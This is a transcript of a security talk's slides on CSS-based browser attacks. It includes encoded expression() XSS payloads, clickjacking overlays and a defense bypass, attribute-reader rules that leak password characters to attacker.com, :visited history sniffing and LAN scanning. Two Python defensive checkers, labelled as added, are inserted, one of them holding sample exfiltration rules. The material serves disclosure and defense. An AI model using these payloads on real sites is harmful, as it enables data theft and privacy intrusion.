Tactical Xploit Css

Post on 29-Nov-2014


The Sexy Assassin

Tactical Exploitation using CSS

CSS Presentation Overview

Old Attacks

New Research

New Attacks

Old Attacks - reloaded

Known attacks using CSS

XSS using CSS - Impact

Session riding/hijacking attacks

Steal page data content

Exploit BoF/HoF/Memory Corruption/etc. vulnerabilities

All other XSS threats

Expression XSS

CSS values can be escaped with backslashes:

<div style=xss:e\xp\re\s\s\i\o\n(alert(1))></div>

Then further encoded with hex/decimal entities:

<div style=xss:e&#92xp&#92re&#92s&#92s&#92i&#92o&#92n(alert(1))></div>

Following the CSS specification you can encode expressions with hex escapes:

<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div>

Expression XSS continued

We can also entity encode the previous vector:

<div style=xss:&#92&#54&#53&#92&#55&#56&#92&#55&#48&#92&#55&#50&#92&#54&#53&#92&#55&#51&#92&#55&#51&#92&#54&#57&#92&#54&#102&#92&#54&#101&#92&#50&#56&#92&#54&#49&#92&#54&#99&#92&#54&#53&#92&#55&#50&#92&#55&#52&#92&#50&#56&#92&#51&#49&#92&#50&#57&#92&#50&#57></div>

External style sheet tricks

• Expressions can be executed in external style sheets

• We can encode the vector

• We can also encode the content

Importing expressions from an XSS file:

<style>@\69\6d\70\6f\72\74 'xss.css';</style>

How can we encode the content of a style sheet?

<style>@import 'utf.css';</style>

UTF-7 Expression

UTF-7 encoded style sheet

@charset "UTF-7";+ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0-

Which produces:

* {xss:expression(alert(1))}

CSS Overlays (clickjacking)

CSS Overlays (clickjacking) Definition:

Convincing the user to click something, and using that click to do something else (bad things).

[Figure: attacker page showing a "Click here to continue" button]

CSS Overlays description

[Figure: original web page (iframe) and its Button]

CSS Overlays advanced attacks

• Multiple iframes nested

• Using offsets to gather a piece of a target site

• No opacity, filled white div regions

• Single sign on services vulnerable

• Combined Javascript and CSS tricks to intercept a click, impossible to know until it's too late

CSS Overlays advanced attacks - Verisign case study

The iframe performs a login request on the site (ficlets.com):

<form action="http://ficlets.com/signin/openid.signin" method="post" id="openid-form" target="iframe">
<input type="hidden" name="openid" id="openid-url" class="text-field" value="openidtester.pip.verisignlabs.com" />
</form>

ficlets.com connects to the Verisign provider.

CSS Overlays advanced attacks - Verisign case study cont.

The OpenID provider (Verisign) is now in our iframe.

Using multiple iframes and div offsets we can cover the other areas with solid colours and position the target area wherever we like.

• Opacity can be used, but solid fills make the attack harder to protect against at the browser level

• Referer checking can neuter the attack, but it is not always available and not implemented on most sites

• Referer can be faked

• David Ross' idea: use a "clickjacket", an accessible style sheet which uses expressions to display a hover popup which appears above other elements

CSS Overlays Workarounds

Someone -> iframe-breaker. In some browsers (IE) JS can be disabled (iframe-breaker-breaker).

NoScript -> Opacity disabled on remote iframes and embedded content. CSS overlays that don't require opacity still work.

Michal Zalewski -> click only if not obstructed. Still works against some no-opacity overlay attacks.

Mozilla -> Delayed disabled buttons. Still exploitable.

David Ross -> X-I-Don't-Wanna-Be-Iframed-Please. Old browsers and websites still vulnerable.

Exploiting clickjacking defenses

• iframe hover state can be intercepted

• No way to tell if you're hovering over an external site

• Clicks can then be transferred to the iframe when a user clicks

<html><head></head><body>
<image ISMAP style="position:absolute;width:100%;height:100%;" onmousedown="this.style.display='none'">
<iframe src="http://www.microsoft.com" id=x type=text/html width=500 height=500 codetype=text/html></iframe>
</image>
</body></html>

Exploiting clickjacking defenses

• Image intercepts the hover state

• Image is hidden onmousedown

• The click is transferred to the iframe because the mousedown state is used; onmouseup we're in the iframe

More clickjacking defenses

• My extension to David Ross' click jacket

• Full metal click jacket

• A CSS accessible style sheet is used to override browser defaults with !important:

iframe, frame, object, applet {
    border: 1px solid #000 !important;
    visibility: visible !important;
    opacity: 1 !important;
    filter: alpha(opacity=100) !important;
    position: absolute !important;
    float: none !important;
    overflow: auto !important;
    ....
}

More clickjacking defenses

Advantages:

• Object styles are locked

• User can see clearly that it is an external site

• Javascript and CSS modification of styles have no effect

Disadvantages:

• Manuel Caballero hacked it :)

• Parent element allows opacity modification

More clickjacking defenses

Browser level CSS locks could prevent attacks

Advantages:

• Hard for an attacker to exploit if external objects are clearly visible and above everything else

Disadvantages:

• Designers would complain about limiting design ideas

• External objects would look ugly

• Could break existing sites
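As an added defender's check (not code from the talk): given a response's headers, classify whether the page can be framed at all, treating the header idea above (what later shipped as X-Frame-Options) and its CSP successor, frame-ancestors, as the defenses. The header names and values are the standard ones; the sample responses at the bottom are constructed.

```python
def framing_policy(headers):
    """Classify how a response restricts being framed, from its response headers.

    Returns (verdict, reason) with verdict in {"strong", "weak", "none"}.
    A CSP frame-ancestors directive takes precedence over X-Frame-Options,
    which is how current browsers resolve the two when both are present."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        name, _, sources = directive.strip().partition(" ")
        if name.lower() != "frame-ancestors":
            continue
        srcs = sources.lower().split()
        if not srcs:
            continue  # malformed directive; defer to X-Frame-Options below
        # A wildcard or a bare scheme source lets any site on that scheme frame us.
        if "*" in srcs or any(s in ("http:", "https:") for s in srcs):
            return "weak", "frame-ancestors allows arbitrary framers: " + sources
        return "strong", "CSP frame-ancestors " + sources
    xfo = h.get("x-frame-options", "").upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "strong", "X-Frame-Options " + xfo
    if xfo.startswith("ALLOW-FROM"):
        # Never supported by Chrome/Safari, which ignore the whole header.
        return "weak", "ALLOW-FROM is ignored by browsers that never supported it"
    if xfo:
        return "none", "unrecognised X-Frame-Options value, treated as absent"
    return "none", "no framing restriction; JS frame-busting alone can be disabled or defeated"


if __name__ == "__main__":
    # Constructed sample responses, not captured from any real site.
    samples = {
        "no header": {},
        "xfo deny": {"X-Frame-Options": "DENY"},
        "csp wildcard": {"Content-Security-Policy": "frame-ancestors *"},
        "csp partner": {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
    }
    for label, hdrs in samples.items():
        print(label, "->", framing_policy(hdrs))
```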

New Research

Algorithms

Arithmetic & Memory - check out the demos on http://p42.us/css

How:

element:condition {
    action;
}

element: anything
condition: :visited, :active, :hover, :selected, etc.
action: background (remote request), display, opacity, visibility.

Loops - check out the demos on http://p42.us/css

Recalc of style:

- META refreshes: <meta http-equiv="refresh" content="0;URL=#1">

- -moz-binding: *{-moz-binding:url("remote-req#id")}

- webkit proposed CSS based animations (not very useful): @keyframes{}

Server Side Interaction - check out the demos on http://p42.us/css

Use HTML+XML data loading (just IE or just FFx): MSIE HTC files, XML DATAFLD, moz-binding

Meta refreshes + stylesheet update (it's not cross-browser): <meta http-equiv="refresh" content="0">

Async stylesheet loading (doesn't work in strict mode):

<element><style>@import"//url1";</style><style>@import"//url2";</style>

Multiple iframe loading (works everywhere):

<iframe src="site.com/"></iframe><iframe src="site.com//"></iframe>

New attacks

Attacks possible thanks to the "theory"

CSS HTML Attribute Reader

CSS HTML Attribute Reader

How to read HTML attributes using CSS, without javascript.

CSS HTML Attribute Reader

Advanced CSS3 Attribute Selectors:

For matching: <input type="password" value="savedpassword"/>

• input{} - Matches all inputs.

• input[type]{} - Matches all inputs with an attribute "type".

• input[type="password"]{} - Matches all inputs of type "password".

CSS HTML Attribute Reader


• input[type*="swor"]{} - Matches all input elements whose type attribute contains "swor" (anywhere)

• input[type^="pass"]{} - Matches all inputs whose type attribute starts with "pass"

• input[type$="word"]{} - Matches all inputs whose type attribute ends with "word"

CSS HTML Attribute Reader

Attempt to read an attribute with the [=] selector, with help of the [*=] selector. First, calculate the range of the chars in the value:

input[value*="\x10"]{ background:url("//attacker.com/?h=\x10");}
…
111 different variations
…
input[value*="\x7F"]{ background:url("//attacker.com/?h=\x7F");}

To calculate the first letter, if we assume from the previous step that the range is [uiopasdf]:

input[value^="u"]{ background:url("//attacker.com/?s=u");}
…
and so on, 8 questions: u, i, o, p, a, s, d, f
…
input[value^="f"]{ background:url("//attacker.com/?s=f");}

CSS HTML Attribute Reader – Try 3

Once we have found the first char (let's say it was d) we continue with [uiopasf]:

input[value^="du"]{ background:url("//attacker.com/?s=du");}
…
and so on, 7 questions: u, i, o, p, a, s, f
…
input[value^="df"]{ background:url("//attacker.com/?s=df");}

CSS HTML Attribute Reader – Try 3

And so on. If we assume a known attribute length, but allow for repeats:

111+N^2 CSS rules

In the worst case for 8 chars: 175 CSS rules

In the worst case for 50 chars: 2,611 CSS rules

CSS HTML Attribute Reader

We can optimize this more, but at an implementation level.

First, we can use [^=] and [$=] selectors at the same time halving the number of requests.

CSS HTML Attribute Reader

1. Detect the range

2. Detect the first char and the eighth char

3. Detect the second char and the seventh char

4. Detect the third char and the sixth char

5. Detect the fourth char and the fifth char

6. Confirm we have the correct string

CSS HTML Attribute Reader

Demo: async stylesheet load attribute reader (read the contents of a text field without JS)

http://eaea.sirdarckcat.net/cssar/

Parallel discovery by Stefano Di Paola (WiSec) with 111*N complexity (888 rules for 8 chars)

http://www.wisec.it/

-1day (0Day-1) - Cross Site Styling

HTML5 describes seamless iframes, so HTML attribute reading would be a vulnerability in a not-yet-implemented standard! Seamless iframes will inherit all styles of the parent document (cross-origin). CSS will read content cross-origin! Call for Microsoft's guys in the W3C HTML5 WG: stop this! Make it same-origin only ;)

<style>@import"exploit";</style><iframe src="victim" seamless="seamless"/>

CSS History Hacks

CSS History Hacks

Attacks based on the ability of CSS to read a browser's history.

Visited boolean

Cross-browser:

<style>
a:visited { background:url(//visited) }
a:not(:visited) { background:url(//not-visited) }
</style>
<a href="http://website/">&nbsp;</a>

Impact: privacy

Counter-measures: Firefox: SafeHistory addon; IE: disable history

Demo: http://ha.ckers.org/weird/CSS-history.cgi
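As an added defensive example (not code from the talk), a scanner for the two rule shapes just described, the attribute reader and the :visited history probe: it flags any stylesheet rule whose match condition (an attribute selector on a sensitive attribute, or a :visited state) triggers a url() fetch to a host other than the page's own. The sample stylesheet and the attacker.example host are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed sample stylesheet: benign rules plus rules shaped like the talk's
# attribute-reader and :visited probes (attacker.example is a made-up host).
SAMPLE_CSS = """
input[type="password"] { border: 1px solid #ccc; }
a:hover { background: url("/img/hover.png"); }
input[value*="\\10"] { background: url("//attacker.example/?h=\\10"); }
input[value^="du"] { background:url("//attacker.example/?s=du"); }
a:visited { background: url(//attacker.example/visited) }
a:not(:visited) { background: url(//attacker.example/not-visited) }
"""

RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}")
# [attr op value] with op in = ^= $= *= |= ~=
ATTR_RE = re.compile(r'\[\s*(\w+)\s*([\^$*|~]?=)\s*("[^"]*"|\'[^\']*\'|[^\]\s]+)\s*\]')
URL_RE = re.compile(r'url\(\s*([\'"]?)([^\'")]*)\1\s*\)', re.I)
SENSITIVE = ("value", "name", "content", "href")


def url_host(raw, page_host):
    """Host a url() token resolves to; relative URLs resolve to the page itself."""
    raw = raw.strip()
    if raw.startswith("//"):
        raw = "https:" + raw
    return urlsplit(raw).hostname or page_host


def find_css_probes(css, page_host):
    """Flag rules whose match condition leaks state to a third-party host."""
    findings = []
    for selector, body in RULE_RE.findall(css):
        sel = selector.strip()
        kinds = ["attr " + op for a, op, _ in ATTR_RE.findall(sel) if a.lower() in SENSITIVE]
        if ":visited" in sel:
            kinds.append("history")
        if not kinds:
            continue
        for _, target in URL_RE.findall(body):
            host = url_host(target, page_host)
            if host != page_host:
                findings.append({"selector": sel, "kind": kinds[0], "host": host})
    return findings


if __name__ == "__main__":
    for f in find_css_probes(SAMPLE_CSS, "app.example"):
        print(f)
```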

CSS LAN Scanner

PoC: CSS LAN Scanner

How it works: error pages don't create a history entry. If a website is valid, it is marked as visited. The scanner just visits a lot of LAN IPs, and checks whether they were marked as visited.

CSS LAN Scanner

[Figure: LAN intranet with the victim, attacker.com, 10.3.22.111 (private webservice) and 192.168.1.254 (configuration router)]

1. Victim visits attacker.com.

2. attacker.com tries to open a lot of local IP addresses in iframes; most will fail.

3. attacker.com then asks which websites appear as visited, and so which IPs are up.

4. The victim responds to the attacker with the visited IPs.

5. attacker.com then tries to guess the service on those IPs based on ports and, if necessary, the content of remote stylesheets.

6. attacker.com then sends CSRF attacks against the software detected on the LAN.

CSSH - CSS Stealing Some History

History Crawler + Navigation Monitoring!

CSSH - History Crawler

[Figure: attacker.com page listing candidate sites: digg.com, twitter.com, slashdot.org, hi5.com, myspace, google news, msn.com, del.icio.us, live.com, sla.ckers.org, Redtube, facebook]

attacker.com shows a lot of possible websites that the user may have visited.

The victim responds to the attacker with the websites visited.

[Figure: attacker.com page listing Link #1 to Link #6]

The attacker fetches the links of those websites, and asks which ones are visited.

The victim responds, and the exploit asks again endlessly.

CSSH - History Crawler

This way we can effectively crawl the commonly visited websites of a user.

The privacy implications of this are huge.

This attack is not a secret; it was described in Mozilla's bug tracker by Paul Stone:

https://bugzilla.mozilla.org/show_bug.cgi?id=147777#c78


CSSH - Navigation Monitoring

What if...

We could detect in real-time the navigation of a user using our history crawler?

Might this be possible?

Yes

CSSH - Navigation Monitoring

1. Victim visits attacker.com.

2. attacker.com sends the exploit to the user, and opens digg.com.

3. The exploit detects that digg.com was visited, so it alerts attacker.com, and attacker.com fetches the links on digg.com.

4. Then the attacker updates the exploit, and starts asking, for each link, whether any of them are visited.

5. When the user finally clicks on a link (say cnn.com), the exploit detects it and alerts attacker.com.

6. attacker.com fetches all links on cnn.com, and updates the exploit, asking whether they were visited.

7. Repeat the above steps indefinitely.

Public demo: http://eaea.sirdarckcat.net/cssh-mon/ (cross-browser)

Thanks

We would like to thank: Bluehat team, David Ross, Robert Hansen, Jeremiah Grossman, Giorgio Maone, Alex K, David Lenoe (Adobe PSIRT), Google Sec. Team, Stefano DiPaola, and everyone else that assisted our research in any way.